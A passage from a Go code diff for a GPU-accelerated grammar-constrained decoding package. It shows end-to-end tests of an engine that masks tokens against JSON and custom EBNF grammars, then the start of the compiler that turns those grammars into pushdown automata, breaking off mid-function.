||||
t.Errorf("vocabSize = %d, want %d", e.vocabSize, len(vocab))
|
||||
}
|
||||
|
||||
// Verify grammar is set
|
||||
if e.grammar == nil {
|
||||
t.Error("grammar should not be nil")
|
||||
}
|
||||
|
||||
// Verify analyzer is set
|
||||
if e.analyzer == nil {
|
||||
t.Error("analyzer should not be nil")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineValidTokens(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// At start, any value type should be valid
|
||||
validTokens := e.validTokens()
|
||||
|
||||
// Should include object start, array start, strings, numbers, booleans, null
|
||||
// Note: bare words like "subword" and "hello" are NOT valid JSON strings
|
||||
// (JSON strings must be quoted)
|
||||
expectedTokens := map[int]bool{
|
||||
0: true, // {
|
||||
2: true, // [
|
||||
6: true, // "key"
|
||||
7: true, // "val"
|
||||
8: true, // 123
|
||||
9: true, // -42.5
|
||||
10: true, // true
|
||||
11: true, // false
|
||||
12: true, // null
|
||||
}
|
||||
|
||||
// Check that expected tokens are present
|
||||
validSet := make(map[int]bool)
|
||||
for _, idx := range validTokens {
|
||||
validSet[idx] = true
|
||||
}
|
||||
|
||||
for idx := range expectedTokens {
|
||||
if !validSet[idx] {
|
||||
t.Errorf("expected token %d (%s) to be valid", idx, vocab[idx])
|
||||
}
|
||||
}
|
||||
|
||||
if validSet[15] || validSet[16] {
|
||||
t.Error("bare words should not be valid JSON at the start state")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineAccept(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Accept { should work
|
||||
if !e.Accept(0) { // {
|
||||
t.Error("should accept {")
|
||||
}
|
||||
|
||||
// After {, valid tokens should be STRING or }
|
||||
validTokens := e.validTokens()
|
||||
|
||||
validSet := make(map[int]bool)
|
||||
for _, idx := range validTokens {
|
||||
validSet[idx] = true
|
||||
}
|
||||
|
||||
// STRING tokens (indices 6, 7) and } (index 1) should be valid
|
||||
if !validSet[1] {
|
||||
t.Error("} should be valid after {")
|
||||
}
|
||||
if !validSet[6] && !validSet[7] {
|
||||
t.Error("STRING should be valid after { (for keys)")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineAcceptSequence(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Accept {"key": "val"}
|
||||
sequence := []int{0, 6, 4, 7, 1} // {, "key", :, "val", }
|
||||
|
||||
for i, tokenID := range sequence {
|
||||
if !e.Accept(tokenID) {
|
||||
t.Fatalf("failed to accept token %d (%s) at position %d",
|
||||
tokenID, vocab[tokenID], i)
|
||||
}
|
||||
}
|
||||
|
||||
if !e.IsComplete() {
|
||||
t.Error("should be in complete state after valid JSON")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineReset(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Accept some tokens
|
||||
e.Accept(0) // {
|
||||
e.Accept(1) // }
|
||||
|
||||
if !e.IsComplete() {
|
||||
t.Error("should be complete after {}")
|
||||
}
|
||||
|
||||
// Reset
|
||||
e.Reset()
|
||||
|
||||
// Should be back to initial state
|
||||
if e.IsComplete() {
|
||||
t.Error("should not be complete after reset")
|
||||
}
|
||||
|
||||
// Should be able to accept new sequence
|
||||
if !e.Accept(0) { // {
|
||||
t.Error("should accept { after reset")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineInvalidTokenRejection(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Accept { first
|
||||
if !e.Accept(0) {
|
||||
t.Fatal("should accept {")
|
||||
}
|
||||
|
||||
// Now try to accept [ which is invalid after {
|
||||
// (After {, only STRING or } are valid)
|
||||
if e.Accept(2) { // [
|
||||
t.Error("should not accept [ after { (expecting STRING or })")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineAcceptString(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Accept using string directly
|
||||
if !e.AcceptString("{") {
|
||||
t.Error("should accept {")
|
||||
}
|
||||
if !e.AcceptString("\"key\"") {
|
||||
t.Error("should accept string key")
|
||||
}
|
||||
if !e.AcceptString(":") {
|
||||
t.Error("should accept :")
|
||||
}
|
||||
if !e.AcceptString("123") {
|
||||
t.Error("should accept number")
|
||||
}
|
||||
if !e.AcceptString("}") {
|
||||
t.Error("should accept }")
|
||||
}
|
||||
|
||||
if !e.IsComplete() {
|
||||
t.Error("should be complete after valid JSON")
|
||||
}
|
||||
}
|
||||
|
||||
func TestJSONBackslashEscape(t *testing.T) {
|
||||
vocab := []string{`"`, `\`, "n", "a"}
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Valid escape: "\n"
|
||||
if !e.AcceptString(`"`) {
|
||||
t.Fatal("should accept string start")
|
||||
}
|
||||
if !e.AcceptString(`\`) {
|
||||
t.Fatal("should accept escape prefix")
|
||||
}
|
||||
if !e.AcceptString("n") {
|
||||
t.Fatal("should accept escape code")
|
||||
}
|
||||
if !e.AcceptString(`"`) {
|
||||
t.Fatal("should accept string end")
|
||||
}
|
||||
if !e.IsComplete() {
|
||||
t.Error("should be complete after escaped string")
|
||||
}
|
||||
|
||||
// Invalid escape: "\a"
|
||||
e.Reset()
|
||||
if !e.AcceptString(`"`) {
|
||||
t.Fatal("should accept string start")
|
||||
}
|
||||
if !e.AcceptString(`\`) {
|
||||
t.Fatal("should accept escape prefix")
|
||||
}
|
||||
if e.AcceptString("a") {
|
||||
t.Error("should reject invalid escape code")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineNegInfMask(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Verify negInfMask exists and has correct shape
|
||||
if e.negInfMask == nil {
|
||||
t.Fatal("negInfMask should not be nil")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineMaskCache(t *testing.T) {
|
||||
vocab := testVocab()
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
// Create test logits
|
||||
logits := mlx.Ones(int32(len(vocab)))
|
||||
|
||||
// Apply mask - should populate cache
|
||||
_ = e.ApplyMask(logits)
|
||||
|
||||
// Check cache was populated
|
||||
cacheSize := e.maskCache.size()
|
||||
if cacheSize == 0 {
|
||||
t.Error("mask cache should have at least one entry after ApplyMask")
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineEmptyVocab(t *testing.T) {
|
||||
e := newTestEngine(t, []string{})
|
||||
defer e.Close()
|
||||
|
||||
if e.vocabSize != 0 {
|
||||
t.Errorf("vocabSize = %d, want 0", e.vocabSize)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEngineLargeVocab(t *testing.T) {
|
||||
// Create a large vocabulary (simulating real model vocab)
|
||||
vocab := make([]string, 32000)
|
||||
for i := range vocab {
|
||||
vocab[i] = "token"
|
||||
}
|
||||
// Add some actual JSON tokens
|
||||
vocab[0] = "{"
|
||||
vocab[1] = "}"
|
||||
vocab[2] = "["
|
||||
vocab[3] = "]"
|
||||
vocab[4] = ":"
|
||||
vocab[5] = ","
|
||||
vocab[6] = "\"test\""
|
||||
vocab[7] = "123"
|
||||
vocab[8] = "true"
|
||||
vocab[9] = "false"
|
||||
vocab[10] = "null"
|
||||
|
||||
e := newTestEngine(t, vocab)
|
||||
defer e.Close()
|
||||
|
||||
if e.vocabSize != 32000 {
|
||||
t.Errorf("vocabSize = %d, want 32000", e.vocabSize)
|
||||
}
|
||||
|
||||
// Test that it still works correctly
|
||||
if !e.Accept(0) { // {
|
||||
t.Error("should accept {")
|
||||
}
|
||||
if !e.Accept(1) { // }
|
||||
t.Error("should accept }")
|
||||
}
|
||||
if !e.IsComplete() {
|
||||
t.Error("should be complete after {}")
|
||||
}
|
||||
}
|
||||
|
||||
// TestE2E_JSONDecoding tests end-to-end JSON constrained decoding.
|
||||
func TestE2E_JSONDecoding(t *testing.T) {
|
||||
// Create a realistic vocabulary with JSON tokens
|
||||
vocab := []string{
|
||||
// Structural tokens
|
||||
"{", "}", "[", "]", ":", ",",
|
||||
// Keywords
|
||||
"true", "false", "null",
|
||||
// Quoted strings
|
||||
`"name"`, `"value"`, `"items"`, `"count"`, `"enabled"`,
|
||||
`"hello"`, `"world"`, `"test"`,
|
||||
// Numbers
|
||||
"0", "1", "2", "3", "42", "123", "-1", "-42",
|
||||
// Whitespace
|
||||
" ", "\n", "\t",
|
||||
// Multi-terminal tokens (span multiple JSON lexemes)
|
||||
`"key":`, `},`, `],`, `{"`, `["`,
|
||||
// Partial/invalid tokens (should be rejected)
|
||||
"invalid", "foo", "bar",
|
||||
}
|
||||
|
||||
grammar, err := JSONGrammar()
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create JSON grammar: %v", err)
|
||||
}
|
||||
|
||||
engine, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
tokens []string
|
||||
wantPass bool
|
||||
}{
|
||||
// Simple values
|
||||
{"empty object", []string{"{", "}"}, true},
|
||||
{"empty array", []string{"[", "]"}, true},
|
||||
{"true literal", []string{"true"}, true},
|
||||
{"null literal", []string{"null"}, true},
|
||||
{"number", []string{"42"}, true},
|
||||
{"negative number", []string{"-42"}, true},
|
||||
{"quoted string", []string{`"hello"`}, true},
|
||||
|
||||
// Objects
|
||||
{"simple object", []string{"{", `"name"`, ":", `"value"`, "}"}, true},
|
||||
{"object with single-digit numbers", []string{"{", `"count"`, ":", "1", ",", `"value"`, ":", "2", "}"}, true},
|
||||
{"multi-terminal key", []string{"{", `"key":`, `"value"`, "}"}, true},
|
||||
|
||||
// Arrays
|
||||
{"array of numbers", []string{"[", "42", "]"}, true},
|
||||
{"array of single digits", []string{"[", "1", ",", "2", "]"}, true},
|
||||
{"array of strings", []string{"[", `"hello"`, ",", `"world"`, "]"}, true},
|
||||
{"nested array", []string{"[", "[", "42", "]", "]"}, true},
|
||||
|
||||
// Nested structures
|
||||
{"nested object", []string{"{", `"items"`, ":", "{", `"count"`, ":", "42", "}", "}"}, true},
|
||||
{"object with array", []string{"{", `"items"`, ":", "[", "42", "]", "}"}, true},
|
||||
|
||||
// Invalid sequences
|
||||
{"unclosed object", []string{"{", `"name"`, ":"}, false}, // incomplete
|
||||
{"double comma", []string{"[", "42", ",", ",", "42", "]"}, false}, // invalid
|
||||
{"missing value", []string{"{", `"name"`, ":", "}"}, false}, // missing value
|
||||
{"bare word", []string{"invalid"}, false}, // not valid JSON
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
engine.Reset()
|
||||
|
||||
// Process each token
|
||||
allAccepted := true
|
||||
for i, token := range tt.tokens {
|
||||
if !engine.AcceptString(token) {
|
||||
if tt.wantPass {
|
||||
t.Errorf("token %d (%q) rejected unexpectedly", i, token)
|
||||
}
|
||||
allAccepted = false
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
if tt.wantPass {
|
||||
if !allAccepted {
|
||||
return // Already reported error
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Errorf("expected complete parse, but not in accepting state")
|
||||
}
|
||||
} else {
|
||||
// For invalid sequences, we expect either rejection or incomplete
|
||||
if allAccepted && engine.IsComplete() {
|
||||
t.Errorf("expected rejection or incomplete, but parse succeeded")
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestE2E_SimpleExpressionGrammar tests a custom expression grammar.
|
||||
func TestE2E_SimpleExpressionGrammar(t *testing.T) {
|
||||
// Simple expression grammar: expr = term { ("+" | "-") term }
|
||||
// term = number | "(" expr ")"
|
||||
// number = digit { digit }
|
||||
// digit = "0" | "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9"
|
||||
exprGrammar := `
|
||||
expr = term { addop term } .
|
||||
addop = "+" | "-" .
|
||||
term = factor { mulop factor } .
|
||||
mulop = "*" | "/" .
|
||||
factor = number | "(" expr ")" .
|
||||
number = digit { digit } .
|
||||
digit = "0" | "1" | "2" | "3" | "4" | "5" | "6" | "7" | "8" | "9" .
|
||||
`
|
||||
|
||||
grammar, err := ParseEBNF(exprGrammar, "expr")
|
||||
if err != nil {
|
||||
t.Fatalf("failed to parse expression grammar: %v", err)
|
||||
}
|
||||
|
||||
// Vocabulary for expression tokens
|
||||
vocab := []string{
|
||||
"0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
|
||||
"+", "-", "*", "/",
|
||||
"(", ")",
|
||||
// Multi-digit numbers as single tokens
|
||||
"10", "42", "100", "123",
|
||||
// Invalid tokens
|
||||
"x", "y", "invalid",
|
||||
}
|
||||
|
||||
engine, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
tokens []string
|
||||
wantPass bool
|
||||
}{
|
||||
{"single digit", []string{"5"}, true},
|
||||
{"multi-digit", []string{"1", "2", "3"}, true},
|
||||
{"addition", []string{"1", "+", "2"}, true},
|
||||
{"subtraction", []string{"5", "-", "3"}, true},
|
||||
{"multiplication", []string{"2", "*", "3"}, true},
|
||||
{"division", []string{"8", "/", "2"}, true},
|
||||
{"complex expr", []string{"1", "+", "2", "*", "3"}, true},
|
||||
{"parentheses", []string{"(", "1", "+", "2", ")", "*", "3"}, true},
|
||||
{"nested parens", []string{"(", "(", "1", ")", ")"}, true},
|
||||
|
||||
// Invalid
|
||||
{"just operator", []string{"+"}, false},
|
||||
{"double operator", []string{"1", "+", "+", "2"}, false},
|
||||
{"unclosed paren", []string{"(", "1", "+", "2"}, false},
|
||||
{"variable", []string{"x"}, false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
engine.Reset()
|
||||
|
||||
allAccepted := true
|
||||
for i, token := range tt.tokens {
|
||||
if !engine.AcceptString(token) {
|
||||
if tt.wantPass {
|
||||
t.Errorf("token %d (%q) rejected unexpectedly", i, token)
|
||||
}
|
||||
allAccepted = false
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
if tt.wantPass {
|
||||
if !allAccepted {
|
||||
return
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Errorf("expected complete parse, but not in accepting state")
|
||||
}
|
||||
} else {
|
||||
if allAccepted && engine.IsComplete() {
|
||||
t.Errorf("expected rejection or incomplete, but parse succeeded")
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestE2E_IdentifierGrammar tests a grammar with character ranges.
|
||||
func TestE2E_IdentifierGrammar(t *testing.T) {
|
||||
// Identifier grammar using character ranges
|
||||
identGrammar := `
|
||||
ident = letter { letter | digit } .
|
||||
letter = "a" … "z" | "A" … "Z" | "_" .
|
||||
digit = "0" … "9" .
|
||||
`
|
||||
|
||||
grammar, err := ParseEBNF(identGrammar, "ident")
|
||||
if err != nil {
|
||||
t.Fatalf("failed to parse identifier grammar: %v", err)
|
||||
}
|
||||
|
||||
// Vocabulary with letters and digits
|
||||
vocab := []string{
|
||||
"a", "b", "c", "x", "y", "z",
|
||||
"A", "B", "C", "X", "Y", "Z",
|
||||
"_",
|
||||
"0", "1", "2", "9",
|
||||
// Multi-char tokens
|
||||
"foo", "bar", "myVar", "test123",
|
||||
// Invalid starting chars
|
||||
"1abc", "123",
|
||||
}
|
||||
|
||||
engine, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
tokens []string
|
||||
wantPass bool
|
||||
}{
|
||||
{"single letter", []string{"a"}, true},
|
||||
{"uppercase", []string{"A"}, true},
|
||||
{"underscore", []string{"_"}, true},
|
||||
{"multi-letter", []string{"a", "b", "c"}, true},
|
||||
{"letter then digit", []string{"x", "1"}, true},
|
||||
{"underscore prefix", []string{"_", "a", "1"}, true},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
engine.Reset()
|
||||
|
||||
allAccepted := true
|
||||
for i, token := range tt.tokens {
|
||||
if !engine.AcceptString(token) {
|
||||
if tt.wantPass {
|
||||
t.Errorf("token %d (%q) rejected unexpectedly", i, token)
|
||||
}
|
||||
allAccepted = false
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
if tt.wantPass && allAccepted && !engine.IsComplete() {
|
||||
t.Errorf("expected complete parse, but not in accepting state")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestE2E_UnicodeRange ensures unicode ranges compile and match tokens.
|
||||
func TestE2E_UnicodeRange(t *testing.T) {
|
||||
greekGrammar := `
|
||||
greek = "α" … "ω" .
|
||||
`
|
||||
|
||||
grammar, err := ParseEBNF(greekGrammar, "greek")
|
||||
if err != nil {
|
||||
t.Fatalf("failed to parse unicode grammar: %v", err)
|
||||
}
|
||||
|
||||
vocab := []string{"α", "β", "ω", "a"}
|
||||
engine, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
if !engine.AcceptString("β") {
|
||||
t.Error("should accept beta")
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Error("should be complete after single rune")
|
||||
}
|
||||
|
||||
engine.Reset()
|
||||
if engine.AcceptString("a") {
|
||||
t.Error("should reject ASCII outside unicode range")
|
||||
}
|
||||
}
|
||||
|
||||
// TestE2E_NondeterminismPreserved tests that nondeterministic paths are preserved.
|
||||
func TestE2E_NondeterminismPreserved(t *testing.T) {
|
||||
// This grammar has nondeterminism: "ab" could be parsed as
|
||||
// a single token or as two tokens "a" "b"
|
||||
ambiguousGrammar := `
|
||||
start = item item .
|
||||
item = "a" | "b" | "ab" .
|
||||
`
|
||||
|
||||
grammar, err := ParseEBNF(ambiguousGrammar, "start")
|
||||
if err != nil {
|
||||
t.Fatalf("failed to parse grammar: %v", err)
|
||||
}
|
||||
|
||||
// Vocabulary with both single and combined tokens
|
||||
vocab := []string{"a", "b", "ab"}
|
||||
|
||||
engine, err := NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create engine: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
// Test: "ab" "a" should be valid (ab as first item, a as second)
|
||||
t.Run("ab then a", func(t *testing.T) {
|
||||
engine.Reset()
|
||||
if !engine.AcceptString("ab") {
|
||||
t.Error("should accept ab")
|
||||
}
|
||||
if !engine.AcceptString("a") {
|
||||
t.Error("should accept a after ab")
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Error("should be complete")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("a then ab", func(t *testing.T) {
|
||||
engine.Reset()
|
||||
if !engine.AcceptString("a") {
|
||||
t.Error("should accept a")
|
||||
}
|
||||
if !engine.AcceptString("ab") {
|
||||
t.Error("should accept ab after a")
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Error("should be complete")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("a then a", func(t *testing.T) {
|
||||
engine.Reset()
|
||||
if !engine.AcceptString("a") {
|
||||
t.Error("should accept first a")
|
||||
}
|
||||
if !engine.AcceptString("a") {
|
||||
t.Error("should accept second a")
|
||||
}
|
||||
if !engine.IsComplete() {
|
||||
t.Error("should be complete")
|
||||
}
|
||||
})
|
||||
}
|
||||
614
x/grammar/grammar.go
Normal file
614
x/grammar/grammar.go
Normal file
@@ -0,0 +1,614 @@
|
||||
//go:build mlx
|
||||
|
||||
// Package grammar provides GPU-accelerated constrained decoding using MLX.
|
||||
// It compiles EBNF grammars to pushdown automata (pda) with precomputed token masks.
|
||||
// For JSON Schema conversion, see the grammar/schema subpackage.
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"encoding/binary"
|
||||
"fmt"
|
||||
"io"
|
||||
"strings"
|
||||
|
||||
"golang.org/x/exp/ebnf"
|
||||
)
|
||||
|
||||
// stackSymbol represents a symbol that can be pushed onto the pda stack.
|
||||
type stackSymbol int
|
||||
|
||||
const (
|
||||
stackEmpty stackSymbol = iota
|
||||
// Additional stack symbols will be generated per-grammar
|
||||
)
|
||||
|
||||
// state represents a pda state.
|
||||
type state int
|
||||
|
||||
const (
|
||||
stateError state = -1
|
||||
stateStart state = 0
|
||||
stateAccept state = 1
|
||||
// Additional states will be generated per-grammar
|
||||
)
|
||||
|
||||
// transition represents a pda transition.
|
||||
// On input matching Pattern, from FromState with stackTop:
|
||||
// - Move to ToState
|
||||
// - Pop StackPop symbols, push StackPush symbols
|
||||
type transition struct {
|
||||
FromState state
|
||||
stackTop stackSymbol // What must be on stack top (stackEmpty = don't care)
|
||||
Pattern string // Input pattern to match (token or character class)
|
||||
ToState state
|
||||
StackPop int // Number of symbols to pop
|
||||
StackPush []stackSymbol // Symbols to push (in order, first pushed first)
|
||||
}
|
||||
|
||||
// pda represents a compiled pushdown automaton.
|
||||
type pda struct {
|
||||
States int // Total number of states
|
||||
StackSymbols int // Total number of stack symbols
|
||||
StartState state // Initial state
|
||||
AcceptStates map[state]bool // Set of accepting states
|
||||
Transitions map[state][]transition // Transitions indexed by from-state
|
||||
|
||||
// For token-level matching
|
||||
Terminals []string // All terminal symbols (patterns to match)
|
||||
}
|
||||
|
||||
// newPDA creates an empty pda.
|
||||
func newPDA() *pda {
|
||||
return &pda{
|
||||
States: 2, // Error and Start
|
||||
StackSymbols: 1, // Empty
|
||||
StartState: stateStart,
|
||||
AcceptStates: make(map[state]bool),
|
||||
Transitions: make(map[state][]transition),
|
||||
Terminals: make([]string, 0),
|
||||
}
|
||||
}
|
||||
|
||||
// addState adds a new state and returns its ID.
|
||||
func (p *pda) addState() state {
|
||||
s := state(p.States)
|
||||
p.States++
|
||||
return s
|
||||
}
|
||||
|
||||
// addStackSymbol adds a new stack symbol and returns its ID.
|
||||
func (p *pda) addStackSymbol() stackSymbol {
|
||||
s := stackSymbol(p.StackSymbols)
|
||||
p.StackSymbols++
|
||||
return s
|
||||
}
|
||||
|
||||
// addTransition adds a transition to the pda.
|
||||
func (p *pda) addTransition(t transition) {
|
||||
p.Transitions[t.FromState] = append(p.Transitions[t.FromState], t)
|
||||
}
|
||||
|
||||
// addTerminal registers a terminal pattern and returns its index.
|
||||
func (p *pda) addTerminal(pattern string) int {
|
||||
for i, t := range p.Terminals {
|
||||
if t == pattern {
|
||||
return i
|
||||
}
|
||||
}
|
||||
p.Terminals = append(p.Terminals, pattern)
|
||||
return len(p.Terminals) - 1
|
||||
}
|
||||
|
||||
// compiler compiles EBNF grammars to PDAs.
|
||||
type compiler struct {
|
||||
grammar ebnf.Grammar
|
||||
pda *pda
|
||||
|
||||
// Maps production names to their entry/exit states
|
||||
prodEntry map[string]state
|
||||
prodExit map[string]state
|
||||
}
|
||||
|
||||
// compile parses an EBNF grammar and compiles it to a pda.
|
||||
func compile(name string, src io.Reader, start string) (*pda, error) {
|
||||
grammar, err := ebnf.Parse(name, src)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("parse grammar: %w", err)
|
||||
}
|
||||
|
||||
if err := ebnf.Verify(grammar, start); err != nil {
|
||||
return nil, fmt.Errorf("verify grammar: %w", err)
|
||||
}
|
||||
|
||||
c := &compiler{
|
||||
grammar: grammar,
|
||||
pda: newPDA(),
|
||||
prodEntry: make(map[string]state),
|
||||
prodExit: make(map[string]state),
|
||||
}
|
||||
|
||||
// Create entry/exit states for each production
|
||||
for name := range grammar {
|
||||
c.prodEntry[name] = c.pda.addState()
|
||||
c.prodExit[name] = c.pda.addState()
|
||||
}
|
||||
|
||||
// compile each production
|
||||
for name, prod := range grammar {
|
||||
if err := c.compileProduction(name, prod); err != nil {
|
||||
return nil, fmt.Errorf("compile production %q: %w", name, err)
|
||||
}
|
||||
}
|
||||
|
||||
// Set start state to entry of start production
|
||||
if entry, ok := c.prodEntry[start]; ok {
|
||||
// Add epsilon transition from pda start to grammar start
|
||||
c.pda.addTransition(transition{
|
||||
FromState: stateStart,
|
||||
Pattern: "", // epsilon
|
||||
ToState: entry,
|
||||
})
|
||||
} else {
|
||||
return nil, fmt.Errorf("start production %q not found", start)
|
||||
}
|
||||
|
||||
// Mark exit of start production as accepting
|
||||
if exit, ok := c.prodExit[start]; ok {
|
||||
c.pda.AcceptStates[exit] = true
|
||||
}
|
||||
|
||||
return c.pda, nil
|
||||
}
|
||||
|
||||
// compileString is a convenience function to compile from a string.
|
||||
func compileString(grammar string, start string) (*pda, error) {
|
||||
return compile("grammar", strings.NewReader(grammar), start)
|
||||
}
|
||||
|
||||
func (c *compiler) compileProduction(name string, prod *ebnf.Production) error {
|
||||
entry := c.prodEntry[name]
|
||||
exit := c.prodExit[name]
|
||||
|
||||
return c.compileExpr(prod.Expr, entry, exit)
|
||||
}
|
||||
|
||||
func (c *compiler) compileExpr(expr ebnf.Expression, entry, exit state) error {
|
||||
switch e := expr.(type) {
|
||||
case *ebnf.Name:
|
||||
return c.compileName(e, entry, exit)
|
||||
case *ebnf.Token:
|
||||
return c.compileToken(e, entry, exit)
|
||||
case ebnf.Sequence:
|
||||
return c.compileSequence(e, entry, exit)
|
||||
case ebnf.Alternative:
|
||||
return c.compileAlternative(e, entry, exit)
|
||||
case *ebnf.Option:
|
||||
return c.compileOption(e, entry, exit)
|
||||
case *ebnf.Repetition:
|
||||
return c.compileRepetition(e, entry, exit)
|
||||
case *ebnf.Group:
|
||||
return c.compileExpr(e.Body, entry, exit)
|
||||
case *ebnf.Range:
|
||||
return c.compileRange(e, entry, exit)
|
||||
case nil:
|
||||
// Empty production - direct epsilon transition
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: "",
|
||||
ToState: exit,
|
||||
})
|
||||
return nil
|
||||
default:
|
||||
return fmt.Errorf("unsupported expression type: %T", expr)
|
||||
}
|
||||
}
|
||||
|
||||
func (c *compiler) compileName(n *ebnf.Name, entry, exit state) error {
|
||||
// Reference to another production
|
||||
prodName := n.String
|
||||
|
||||
prodEntry, ok := c.prodEntry[prodName]
|
||||
if !ok {
|
||||
return fmt.Errorf("undefined production: %s", prodName)
|
||||
}
|
||||
prodExit := c.prodExit[prodName]
|
||||
// Use a unique stack symbol per call site so returns are unambiguous.
|
||||
stackSym := c.pda.addStackSymbol()
|
||||
|
||||
// Push return address, go to production entry
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: "", // epsilon
|
||||
ToState: prodEntry,
|
||||
StackPush: []stackSymbol{stackSym},
|
||||
})
|
||||
|
||||
// On production exit, pop and return
|
||||
c.pda.addTransition(transition{
|
||||
FromState: prodExit,
|
||||
stackTop: stackSym,
|
||||
Pattern: "", // epsilon
|
||||
ToState: exit,
|
||||
StackPop: 1,
|
||||
})
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *compiler) compileToken(t *ebnf.Token, entry, exit state) error {
|
||||
// terminal symbol - add transition that consumes this token
|
||||
pattern := t.String
|
||||
c.pda.addTerminal(pattern)
|
||||
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: pattern,
|
||||
ToState: exit,
|
||||
})
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *compiler) compileSequence(seq ebnf.Sequence, entry, exit state) error {
|
||||
if len(seq) == 0 {
|
||||
// Empty sequence - epsilon transition
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: "",
|
||||
ToState: exit,
|
||||
})
|
||||
return nil
|
||||
}
|
||||
|
||||
// Chain: entry -> s1 -> s2 -> ... -> exit
|
||||
current := entry
|
||||
for i, expr := range seq {
|
||||
var next state
|
||||
if i == len(seq)-1 {
|
||||
next = exit
|
||||
} else {
|
||||
next = c.pda.addState()
|
||||
}
|
||||
|
||||
if err := c.compileExpr(expr, current, next); err != nil {
|
||||
return err
|
||||
}
|
||||
current = next
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *compiler) compileAlternative(alt ebnf.Alternative, entry, exit state) error {
|
||||
// Each alternative goes from entry to exit
|
||||
for _, expr := range alt {
|
||||
if err := c.compileExpr(expr, entry, exit); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *compiler) compileOption(opt *ebnf.Option, entry, exit state) error {
|
||||
// Optional: can skip (epsilon) or take the body
|
||||
|
||||
// Epsilon transition (skip)
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: "",
|
||||
ToState: exit,
|
||||
})
|
||||
|
||||
// Or take the body
|
||||
return c.compileExpr(opt.Body, entry, exit)
|
||||
}
|
||||
|
||||
func (c *compiler) compileRepetition(rep *ebnf.Repetition, entry, exit state) error {
|
||||
// Repetition {body}: zero or more
|
||||
// entry -> exit (skip)
|
||||
// entry -> body -> entry (loop back)
|
||||
|
||||
// Skip transition
|
||||
c.pda.addTransition(transition{
|
||||
FromState: entry,
|
||||
Pattern: "",
|
||||
ToState: exit,
|
||||
})
|
||||
|
||||
